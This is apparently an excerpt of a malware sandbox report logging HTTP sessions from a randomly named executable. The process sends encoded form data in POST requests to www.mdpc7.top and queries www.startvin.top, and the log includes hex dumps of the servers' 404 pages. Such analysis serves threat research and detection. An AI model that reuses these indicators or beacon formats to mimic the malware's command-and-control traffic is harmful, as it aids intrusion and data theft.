                                                                  Data Ascii: -5.583823,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798
                                                                  Nov 18, 2024 13:14:38.756515026 CET424INData Raw: 37 20 31 39 2e 39 38 39 35 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e
                                                                  Data Ascii: 7 19.98957,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -
                                                                  Nov 18, 2024 13:14:38.756531954 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                                  Nov 18, 2024 13:14:38.756551027 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                                  Nov 18, 2024 13:14:38.756772041 CET424INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                                  Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                                  Nov 18, 2024 13:14:38.756789923 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                                  Nov 18, 2024 13:14:38.761657953 CET1236INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                                  Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.753176203.161.46.205803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:40.610688925 CET541OUTGET /chrv/?tD_=f00xUVKh&0PIXBf9=oqIvPuLKU6ipUF0l0s9jGwC5Rs+ISH+IiXTOUljk/btMUGhxXUhy/ROn8iRvBZThJHrBfDF95d/bLV86djItjxOaoccx9TISaPCf4hbQm/G+Yq+LkHY0VTYNMEk+ymSz3ZEiRr7ur/of HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.startvin.top
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:14:41.324331045 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 18 Nov 2024 12:14:41 GMT
                                                                  Server: Apache
                                                                  Content-Length: 16052
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                  Nov 18, 2024 13:14:41.324358940 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                  Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                  Nov 18, 2024 13:14:41.324373960 CET1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                                  Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                                  Nov 18, 2024 13:14:41.324507952 CET636INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                                  Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                                  Nov 18, 2024 13:14:41.324538946 CET1236INData Raw: 34 36 37 33 20 39 2e 37 36 30 31 33 32 2c 34 38 2e 36 36 33 34 39 20 34 2e 34 31 36 36 34 32 2c 31 38 2e 34 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20
                                                                  Data Ascii: 4673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                  Nov 18, 2024 13:14:41.324553013 CET1236INData Raw: 2c 31 39 2e 32 34 39 32 31 20 2d 33 2e 33 35 30 32 2c 33 31 2e 32 34 36 31 39 20 2d 32 2e 31 38 33 37 36 2c 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d
                                                                  Data Ascii: ,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-li
                                                                  Nov 18, 2024 13:14:41.324565887 CET1236INData Raw: 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b
                                                                  Data Ascii: 00000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4537" d="m 87.0625,123.03748 c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.80416 1.458
                                                                  Nov 18, 2024 13:14:41.324793100 CET1236INData Raw: 30 32 38 33 2c 33 31 2e 34 31 36 36 35 20 2d 32 2e 31 38 37 38 34 37 2c 31 30 2e 32 34 33 38 34 20 2d 33 2e 39 35 35 34 30 37 2c 32 30 2e 31 34 32 31 38 20 2d 35 2e 30 37 34 39 37 35 2c 32 36 2e 30 33 34 38 33 20 2d 31 2e 31 31 39 35 36 38 2c 35
                                                                  Data Ascii: 0283,31.41665 -2.187847,10.24384 -3.955407,20.14218 -5.074975,26.03483 -1.119568,5.89264 -1.59092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.8
                                                                  Nov 18, 2024 13:14:41.324806929 CET1236INData Raw: 20 37 2e 34 32 35 31 35 35 2c 2d 30 2e 30 35 38 39 20 31 31 2e 31 33 37 30 32 37 2c 2d 30 2e 32 33 35 36 39 20 33 2e 37 31 31 38 37 35 2c 2d 30 2e 31 37 36 37 39 20 37 2e 33 36 36 32 32 35 2c 2d 30 2e 35 33 30 34 33 20 31 30 2e 37 32 34 34 37 35
                                                                  Data Ascii: 7.425155,-0.0589 11.137027,-0.23569 3.711875,-0.17679 7.366225,-0.53043 10.724475,-0.70716 3.35826,-0.17672 6.4233,-0.17672 9.48702,-0.58922 3.06372,-0.41251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;strok
                                                                  Nov 18, 2024 13:14:41.324820995 CET1060INData Raw: 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 65 6c 6c 69 70 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 34 2e 33 31 35 38 35 37 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 78 3d 22 34 2e 39 30 30 31 37 30 33 22 0a 20 20
                                                                  Data Ascii: " /> <ellipse ry="4.3158579" rx="4.9001703" cy="4.3948641" cx="85.016434" id="path4616" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-ru
                                                                  Nov 18, 2024 13:14:41.329731941 CET1236INData Raw: 2d 33 2e 32 36 31 32 31 20 36 2e 36 31 37 30 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79
                                                                  Data Ascii: -3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transfor


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.75317720.2.36.112803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:47.588737011 CET795OUTPOST /55tt/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.mdpc7.top
                                                                  Origin: http://www.mdpc7.top
                                                                  Referer: http://www.mdpc7.top/55tt/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 44 69 4f 65 61 66 6c 71 31 48 4f 55 53 62 54 6c 53 7a 39 7a 46 6e 45 55 50 39 34 55 32 4e 4a 33 51 2f 65 4c 35 55 42 48 73 30 49 41 5a 43 73 2f 59 4e 63 77 32 59 36 45 53 6f 59 30 69 45 50 76 6d 41 70 77 63 62 34 54 74 61 4f 56 65 6d 4a 42 6f 4f 7a 52 34 50 69 47 75 4c 43 4b 6a 4c 76 4d 43 45 78 59 35 2f 64 4f 43 7a 67 68 38 65 4e 30 4f 67 49 70 30 62 61 4d 4b 7a 34 68 59 47 50 46 67 75 52 66 34 4f 41 41 7a 78 54 61 6a 36 47 74 39 69 64 47 2b 66 38 6c 32 4c 4c 61 77 65 6c 65 33 4b 6c 6e 6a 35 34 57 54 6a 32 35 2b 54 49 30 35 39 65 7a 6d 6a 71 76 49 5a 48 76 6b 41 67 6d 54 47 66 4f 77 75 79 30 5a 4a 2b 43 66 62 5a 6c 5a 67 3d 3d
                                                                  Data Ascii: 0PIXBf9=DiOeaflq1HOUSbTlSz9zFnEUP94U2NJ3Q/eL5UBHs0IAZCs/YNcw2Y6ESoY0iEPvmApwcb4TtaOVemJBoOzR4PiGuLCKjLvMCExY5/dOCzgh8eN0OgIp0baMKz4hYGPFguRf4OAAzxTaj6Gt9idG+f8l2LLawele3Klnj54WTj25+TI059ezmjqvIZHvkAgmTGfOwuy0ZJ+CfbZlZg==
                                                                  Nov 18, 2024 13:14:48.539200068 CET336INHTTP/1.1 404 Not Found
                                                                  Content-Length: 162
                                                                  Content-Type: text/html;charset=utf-8
                                                                  Date: Mon, 18 Nov 2024 12:14:48 GMT
                                                                  Server: nginx
                                                                  X-Cache: BYPASS
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.75317820.2.36.112803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:50.135369062 CET815OUTPOST /55tt/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.mdpc7.top
                                                                  Origin: http://www.mdpc7.top
                                                                  Referer: http://www.mdpc7.top/55tt/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 44 69 4f 65 61 66 6c 71 31 48 4f 55 54 37 6a 6c 51 51 56 7a 45 48 45 4c 41 64 34 55 2f 74 4a 7a 51 2f 53 4c 35 58 4d 43 74 42 34 41 5a 6a 63 2f 5a 4a 41 77 6a 59 36 45 4b 59 59 31 76 6b 50 6b 6d 41 56 4f 63 5a 73 54 74 65 6d 56 65 6a 74 42 6f 2f 7a 51 35 66 69 45 77 72 43 49 74 72 76 4d 43 45 78 59 35 2f 35 30 43 7a 6f 68 39 75 39 30 4f 45 63 71 71 4c 61 54 61 6a 34 68 63 47 50 37 67 75 51 38 34 50 63 75 7a 30 66 61 6a 36 57 74 39 7a 64 4a 30 66 38 6e 37 72 4b 31 33 75 52 51 34 34 35 48 35 35 77 79 61 79 79 67 2f 6c 4a 57 6a 66 53 66 34 79 53 55 4d 62 6a 5a 7a 6d 39 54 52 48 62 57 39 4d 47 56 47 2b 62 6f 53 4a 34 68 50 62 4b 30 63 7a 53 30 4c 76 79 48 30 6d 64 47 63 53 2f 65 53 64 4d 3d
                                                                  Data Ascii: 0PIXBf9=DiOeaflq1HOUT7jlQQVzEHELAd4U/tJzQ/SL5XMCtB4AZjc/ZJAwjY6EKYY1vkPkmAVOcZsTtemVejtBo/zQ5fiEwrCItrvMCExY5/50Czoh9u90OEcqqLaTaj4hcGP7guQ84Pcuz0faj6Wt9zdJ0f8n7rK13uRQ445H55wyayyg/lJWjfSf4ySUMbjZzm9TRHbW9MGVG+boSJ4hPbK0czS0LvyH0mdGcS/eSdM=
                                                                  Nov 18, 2024 13:14:51.087090015 CET336INHTTP/1.1 404 Not Found
                                                                  Content-Length: 162
                                                                  Content-Type: text/html;charset=utf-8
                                                                  Date: Mon, 18 Nov 2024 12:14:50 GMT
                                                                  Server: nginx
                                                                  X-Cache: BYPASS
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.75317920.2.36.112803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:52.689707994 CET1828OUTPOST /55tt/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.mdpc7.top
                                                                  Origin: http://www.mdpc7.top
                                                                  Referer: http://www.mdpc7.top/55tt/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 44 69 4f 65 61 66 6c 71 31 48 4f 55 54 37 6a 6c 51 51 56 7a 45 48 45 4c 41 64 34 55 2f 74 4a 7a 51 2f 53 4c 35 58 4d 43 74 42 77 41 65 52 6b 2f 59 6f 41 77 6c 6f 36 45 48 34 59 6f 76 6b 50 31 6d 41 39 4b 63 5a 78 78 74 63 65 56 66 41 56 42 6a 73 72 51 77 66 69 45 34 4c 43 4e 6a 4c 75 55 43 45 68 69 35 2f 4a 30 43 7a 6f 68 39 73 56 30 4d 51 49 71 6f 4c 61 4d 4b 7a 35 75 59 47 4f 57 67 74 67 43 34 4d 77 51 7a 67 6a 61 69 65 4b 74 38 42 31 4a 70 76 38 68 33 4c 4b 74 33 75 4d 53 34 35 56 4c 35 36 73 55 61 77 79 67 2b 30 34 51 7a 4c 62 45 75 6b 53 69 43 36 33 30 2b 6e 70 4f 4f 31 58 58 2b 65 71 62 47 4f 6a 50 56 4a 34 4e 4e 74 2f 6a 42 68 71 2f 54 65 79 4f 6e 51 38 59 5a 48 6a 63 51 72 73 4c 42 49 6b 78 42 69 4a 41 66 50 6a 62 39 49 2f 63 74 63 63 33 54 55 75 39 75 48 76 55 42 4f 36 64 58 71 2f 79 70 44 37 6a 41 69 47 2b 67 56 35 33 32 76 51 75 53 64 61 32 71 2b 76 70 4f 2b 39 62 49 2b 5a 33 51 33 78 4c 5a 58 56 54 68 52 78 77 52 63 67 6f 74 38 58 72 69 31 54 78 50 49 6c 61 59 38 [TRUNCATED]
                                                                  Data Ascii: 0PIXBf9=DiOeaflq1HOUT7jlQQVzEHELAd4U/tJzQ/SL5XMCtBwAeRk/YoAwlo6EH4YovkP1mA9KcZxxtceVfAVBjsrQwfiE4LCNjLuUCEhi5/J0Czoh9sV0MQIqoLaMKz5uYGOWgtgC4MwQzgjaieKt8B1Jpv8h3LKt3uMS45VL56sUawyg+04QzLbEukSiC630+npOO1XX+eqbGOjPVJ4NNt/jBhq/TeyOnQ8YZHjcQrsLBIkxBiJAfPjb9I/ctcc3TUu9uHvUBO6dXq/ypD7jAiG+gV532vQuSda2q+vpO+9bI+Z3Q3xLZXVThRxwRcgot8Xri1TxPIlaY8PguiiXVPR6dyl5yUxw2H3d77V/IKhDEflu1NayB3+YoOA6UdbQQlOS3kURu3A28iStZrwVV1nh1qvV2MWJg60cX2aXUWd2h01zGfMhB+WLla2vLu+6RBUStDdY+/Lcr00jy9hcpi/FwGt6UlXifDYn1Xu6ZQ/lhtCLqhVDfQ2eZIP7PZn9rhqm9xAUiMHsqCwdEb8+lxXYzMrWegan/COpP2Fz4zblqzGILROR0Xp+WZpfuAC193olOfqVKCxTqb7Yj1NbIKJQHqPW4qnGgtr3Qt4qfRc3LLOdr5JGdEpo8p+pQV8XmmtLsJ6xBF1acNjhQ6uhYZQzL1lFYRa1X49NIxa7+WzOJWw6MKnaVMeTLEzhOVi5PresZMr8gr02jImFi8+/thg24NN8ndMXnLnLr4Tzw9dKqd+0uBRZPDspaWyusEcsCDJa8A09pb6aOu0CQKUiWd/7OJ6gAnFa9GeQg+fo7p8Oa7jUj0xCKiR7UGV6P2CXQo30h9ZkU5TVChqM9Z1OdH1smGMb5603/O+sxMwiTQLz2a89CFqVY/ShBmpz7YMH8rFAcMo3Vx5f7Fp3JYUV4OSLHbV6Wc6W2h5yMzmKu/H2KVhMvuLSUBZQYYVxnchlWwK0QsqHtBSnEjmmHoOHsxGLykjSQZyz2oscYIrZzpmPge2A [TRUNCATED]
                                                                  Nov 18, 2024 13:14:53.614986897 CET336INHTTP/1.1 404 Not Found
                                                                  Content-Length: 162
                                                                  Content-Type: text/html;charset=utf-8
                                                                  Date: Mon, 18 Nov 2024 12:14:53 GMT
                                                                  Server: nginx
                                                                  X-Cache: BYPASS
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.75318020.2.36.112803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
